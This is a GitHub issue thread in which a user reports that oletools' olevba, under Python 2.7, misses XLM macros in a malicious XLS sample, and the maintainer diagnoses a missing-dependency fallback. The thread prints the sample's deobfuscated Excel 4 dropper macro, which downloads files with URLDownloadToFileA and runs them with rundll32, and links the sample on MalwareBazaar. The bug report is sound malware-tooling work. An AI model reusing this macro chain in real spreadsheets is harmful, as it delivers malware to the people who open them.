Open randubin opened 2 years ago
I can see this problem was solved in version oletools-0.60.1.dev6. Sorry.
Sorry, for Python 3.8.8 it works with the latest version. For Python 2.7.18 with the latest oletools (0.60.1.dev6), OleId and olevba do not detect the macro. Python 2.7.18:
Type: OLE
ERROR Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/olevba.py", line 3454, in _extract_xlm_plugin_biff
self.xlm_macros = biff_plugin.Analyze()
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
cellref, expression = ParseLoc(expression, cellrefformat, True)
File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
row, column = struct.unpack(formatcodes, expression[0:formatsize])
error: unpack requires a string argument of length 4
No VBA or XLM macros found.
Python 3.8.8:
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: DocuSign., Macrosheet
' CELL:E178, =EXEC((('Bob'!L39&" ")&'Bob'!J39)&'Bob'!L41), 0
' CELL:D181, =Kopaters(0.0,('Bob'!J43&C191)&C185,'Bob'!J39&"2",0.0,0.0), 29
' CELL:D183, =Kopaters(0.0,('Bob'!J43&C193)&C185,'Bob'!J39&"4",0.0,0.0), 29
' CELL:E182, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"4")&'Bob'!L41), 0
' CELL:E180, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"2")&'Bob'!L41), 0
' CELL:D185, =Kopaters(0.0,('Bob'!J43&C195)&C185,'Bob'!J39&"6",0.0,0.0), 29
' CELL:E184, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"6")&'Bob'!L41), 0
' CELL:D178, =REGISTER((((('Bob'!H39&'Bob'!H40)&'Bob'!H41)&'Bob'!H42)&'Bob'!H43)&'Bob'!H44,(((((((((('Bob'!I39&'Bob'!I40)&'Bob'!I41)&'Bob'!I42)&'Bob'!I43)&'Bob'!I44)&'Bob'!I45)&'Bob'!I46)&'Bob'!I47)&'Bob'!I48)&'Bob'!I49)&"ToFileA","JJCCBB","Kopaters",,1.0,9.0), 0
' CELL:E186, =HALT(), 0
' CELL:D182, =Kopaters(0.0,('Bob'!J43&C192)&C185,'Bob'!J39&"3",0.0,0.0), 29
' CELL:D180, =Kopaters(0.0,('Bob'!J43&C190)&C185,'Bob'!J39&"1",0.0,0.0), 29
' CELL:A180, =GOTO(D178), 0
' CELL:E179, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"1")&'Bob'!L41), 0
' CELL:D184, =Kopaters(0.0,('Bob'!J43&C194)&C185,'Bob'!J39&"5",0.0,0.0), 29
' CELL:C185, =<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&".jpg", 3118268.jpg
' CELL:E181, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"3")&'Bob'!L41), 0
' CELL:E183, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"5")&'Bob'!L41), 0
' CELL:D188, =GOTO(E178), 42
' CELL:D179, =D184, 0.0
...
..
' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:
' CELL:A180 , FullEvaluation , GOTO(D178)
' CELL:D178 , FullEvaluation , =REGISTER("URLMon","URLDownloadToFileA","JJCCBB","Kopaters",1,9)
' CELL:D179 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D180 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss1",0,0)
' CELL:D181 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss2",0,0)
' CELL:D182 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss3",0,0)
' CELL:D183 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss4",0,0)
' CELL:D184 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D185 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss6",0,0)
' CELL:D188 , FullEvaluation , GOTO(E178)
' CELL:E178 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss,DllRegisterServer")
' CELL:E179 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss1,DllRegisterServer")
' CELL:E180 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss2,DllRegisterServer")
' CELL:E181 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss3,DllRegisterServer")
' CELL:E182 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss4,DllRegisterServer")
' CELL:E183 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss5,DllRegisterServer")
' CELL:E184 , PartialEvaluation , =EXEC("rundll32 ..\GGrioda.deriiiss6,DllRegisterServer")
' CELL:E186 , End , HALT()
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|URLDownloadToFileA |May download files from the Internet |
|Suspicious|EXEC |May run an executable file or a system |
| | |command using Excel 4 Macros (XLM/XLF) |
|Suspicious|REGISTER |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
...
...
...
|Suspicious|XLM macro |XLM macro found. It may contain malicious |
| | |code |
+----------+----------------
I see that on Python 3 you have XLMMacroDeobfuscator installed, so it works well. But on Python 2 it is not installed, so olevba falls back to plugin_biff instead, and it triggers an exception when parsing the macro.
If you install XLMMacroDeobfuscator on python 2 it should work: could you please try?
You can do it by running pip2 install -U oletools[full]
It seems that XLMMacroDeobfuscator doesn't support Python 2, only >3.4. I tried to install it with 'full', but I am getting the following error:
ERROR: Could not find a version that satisfies the requirement complete (from versions: none)
ERROR: No matching distribution found for full
When installing XLMMacroDeobfuscator directly, I am getting:
ERROR: Package 'XLMMacroDeobfuscator' requires a different Python: 2.7.18 not in '>=3.4'
Thanks for the help!
OK, good catch. Then I need to adapt the setup script for python 2. And to improve error handling when executing plugin_biff + check why oleid reports macros and not olevba.
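An added illustration of the failure mode described in this thread, not oletools code: a guarded version of the row/column unpack that the Python 2 traceback fails in, so a truncated record is reported instead of escaping as a bare struct.error. The '<HH' format codes and the zero-based row/column encoding are assumptions for the example; the sample byte strings are constructed.

```python
import struct

# Constructed stand-in for the row/column unpack in plugin_biff's ParseLoc (a hypothetical
# simplification, not the oletools code). A cell reference is assumed to be two
# little-endian 16-bit integers: zero-based row, then zero-based column.
FORMATCODES = '<HH'
FORMATSIZE = struct.calcsize(FORMATCODES)  # 4, the length the traceback complains about

class TruncatedExpression(ValueError):
    """A formula expression ended before a complete cell reference."""

def parse_loc(expression):
    """Return ((row, column), remaining_bytes), or raise TruncatedExpression.
    The length check turns a bare struct.error into a typed, reportable condition."""
    chunk = expression[:FORMATSIZE]
    if len(chunk) < FORMATSIZE:
        raise TruncatedExpression('expected %d bytes for a cell reference, got %d'
                                  % (FORMATSIZE, len(chunk)))
    row, column = struct.unpack(FORMATCODES, chunk)
    return (row, column), expression[FORMATSIZE:]

def cell_name(row, column):
    """Zero-based (row, column) to A1 notation: (177, 4) -> 'E178'."""
    letters = ''
    column += 1
    while column:
        column, rem = divmod(column - 1, 26)
        letters = chr(ord('A') + rem) + letters
    return '%s%d' % (letters, row + 1)

def analyze_expressions(expressions):
    """Parse every expression; return (parsed, errors).
    A truncated record is logged and parsing continues, so one bad record cannot
    turn a sheet full of macros into 'No VBA or XLM macros found'."""
    parsed, errors = [], []
    for idx, expr in enumerate(expressions):
        try:
            (row, column), rest = parse_loc(expr)
            parsed.append((idx, cell_name(row, column), rest))
        except TruncatedExpression as exc:
            errors.append((idx, str(exc)))
    return parsed, errors

# Constructed sample: references to E178 and D178 (cells seen in the output above),
# then a reference cut off after 3 bytes, as a truncated record would be.
SAMPLE = [b'\xb1\x00\x04\x00', b'\xb1\x00\x03\x00\x01', b'\xb1\x00\x04']
```

Running analyze_expressions(SAMPLE) yields the two well-formed cells and one recorded error for the short record, which is the kind of partial result olevba could surface instead of a silent negative.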
Affected tool: olevba version 0.6 (latest)
Describe the bug: olevba failed to show and detect the macro inside the XLS file, while OleId does indicate that.
File/Malware sample to reproduce the bug:
Link: https://bazaar.abuse.ch/sample/2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f/
sha256: 2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f
OleId:
How To Reproduce the bug: regular run of oleid and olevba.
Expected behavior: olevba macro detected.
Console output / Screenshots:
Version information:
Additional context: no need.